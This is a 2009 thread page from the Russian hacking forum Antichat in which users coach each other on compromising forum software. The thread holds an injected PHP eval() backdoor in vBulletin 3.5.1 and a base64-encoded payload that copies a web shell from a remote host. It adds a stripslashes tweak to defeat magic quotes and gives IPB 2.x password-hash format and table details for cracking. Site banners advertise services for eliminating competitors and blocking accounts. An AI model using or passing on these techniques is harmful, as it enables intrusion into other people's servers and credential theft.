FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Нет аккаунта?
Регистрация
ВЫЕЗД ИЗ УКРАИНЫ • ОФОРМЛЕНИЕ ДОКУМЕНТОВ • БРОНИРОВАНИЕ • ПОМОЩЬ С ТЦК
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
Ваши вопросы по уязвимостям.
Поиск по форуму
Расширенный поиск
Страница 888 из 2422
«
Первая
<
388
788
838
878
884
885
886
887
888
889
890
891
892
898
938
988
1388
1888
>
Последняя
»
Опции темы
Поиск в этой теме
Опции просмотра
#
1
16.09.2009, 17:09
Explоit
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
Плиз, дайте чёткие указание как залить шелл в vbulitin 3.5.1, я писал код в модулях,
местоположение faq_comlete, код например
Цитата:
copy("http://ааа/file.txt","./shell.php");
при заходе на faq.php? выскакивали "ошибки содержимого", шелл не залился. Но когда вписал
Цитата:
eval($_GET[e]);
то заработало faq?e=phpinfo();
Дайте пожалуйста чёткие указания, какой код вписать в faq.?e=
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
Explоit
Посмотреть профиль
Репутация
Найти все сообщения от Explоit
Добавить в друзья
#
2
16.09.2009, 17:14
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
Код:
e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');
mailbrush
Посмотреть профиль
Репутация
Отправить личное сообщение для mailbrush
Найти все сообщения от mailbrush
Добавить в друзья
#
3
16.09.2009, 17:15
Explоit
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
Цитата:
Сообщение от
mailbrush
Код:
e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');
там магические кавычки в ON
Explоit
Посмотреть профиль
Репутация
Найти все сообщения от Explоit
Добавить в друзья
#
4
16.09.2009, 17:19
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
Цитата:
Сообщение от
Explоit
там магические кавычки в ON
eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));
geezer.code
Посмотреть профиль
Репутация
Отправить личное сообщение для geezer.code
Найти все сообщения от geezer.code
Добавить в друзья
#
5
16.09.2009, 17:23
Explоit
Banned
Регистрация: 21.07.2009
Сообщений: 20
С нами:
8845773
Репутация:
-11
Цитата:
Сообщение от
geezer.code
eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));
Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)
Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?
Explоit
Посмотреть профиль
Репутация
Найти все сообщения от Explоit
Добавить в друзья
#
6
16.09.2009, 21:15
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
Цитата:
Сообщение от
Explоit
Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)
Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?
Директива magic_quotes_gpc действует ТОЛЬКО на значения Get, Post и Cookie.
mailbrush
Посмотреть профиль
Репутация
Отправить личное сообщение для mailbrush
Найти все сообщения от mailbrush
Добавить в друзья
#
7
16.09.2009, 17:32
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
А root не пользователь? И поимев рута у тебя есть большая вероятность поиметь обычного пользователя.
ЗЫ: и експлоиты не обязательно повышают права до рута...
mailbrush
Посмотреть профиль
Репутация
Отправить личное сообщение для mailbrush
Найти все сообщения от mailbrush
Добавить в друзья
#
8
16.09.2009, 18:01
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
Как можно залить в IPB шелл и где в БД храняться хэши паролей?
PS есть доступ на чтение БД
Версия форума 2.3.6
Последний раз редактировалось Byrger; 16.09.2009 в
18:16
..
Byrger
Посмотреть профиль
Репутация
Отправить личное сообщение для Byrger
Найти все сообщения от Byrger
Добавить в друзья
#
9
16.09.2009, 20:22
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
Цитата:
Сообщение от
Byrger
Как можно залить в IPB шелл и где в БД храняться хэши паролей?
PS есть доступ на чтение БД
Версия форума 2.3.6
1) IPB 2.x.x - md5(md5($salt).md5($pass)), префикс - whb_, таблица - members_converge, salt - 5 символов
2)
https://forum.antichat.ru/threadedpost1095553.html
z00MAN
Посмотреть профиль
Репутация
Отправить личное сообщение для z00MAN
Найти все сообщения от z00MAN
Добавить в друзья
#
10
16.09.2009, 22:57
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
Что можно сделать с таким?
http://bestquest.info/test.php
upd: аа... Ясно... Это просто корень сайта в корне сервера лежит
Последний раз редактировалось mailbrush; 16.09.2009 в
23:02
..
mailbrush
Посмотреть профиль
Репутация
Отправить личное сообщение для mailbrush
Найти все сообщения от mailbrush
Добавить в друзья
Страница 888 из 2422
«
Первая
<
388
788
838
878
884
885
886
887
888
889
890
891
892
898
938
988
1388
1888
>
Последняя
»
Предыдущая тема
Следующая тема
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)
PEPSICOLA
Болталка
188
23.05.2010
10:05
Ваши любимые компьютерные игры
PEPSICOLA
Болталка
280
19.08.2009
00:01
Ваши телеги...
F-IFTY
Болталка
13
18.08.2009
18:22
Вопросы по Ipb 2.0
Voodoo_People
Уязвимости CMS / форумов
26
15.02.2005
22:57
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ТЕХНОЛОГИИ И AI
Искусственный интеллект (AI)
Нейросети и промптинг
AI автоматизация
Разработка AI-агентов
Технологические новости
Стартапы, бизнес и инвестиции
Программирование с AI
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ТЕНЕВОЙ РЫНОК
Пробив информации
Карты, кошельки, биржи
Документы готовые и под заказ
Способы и схемы заработка
Арбитраж трафика
Барахолка
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.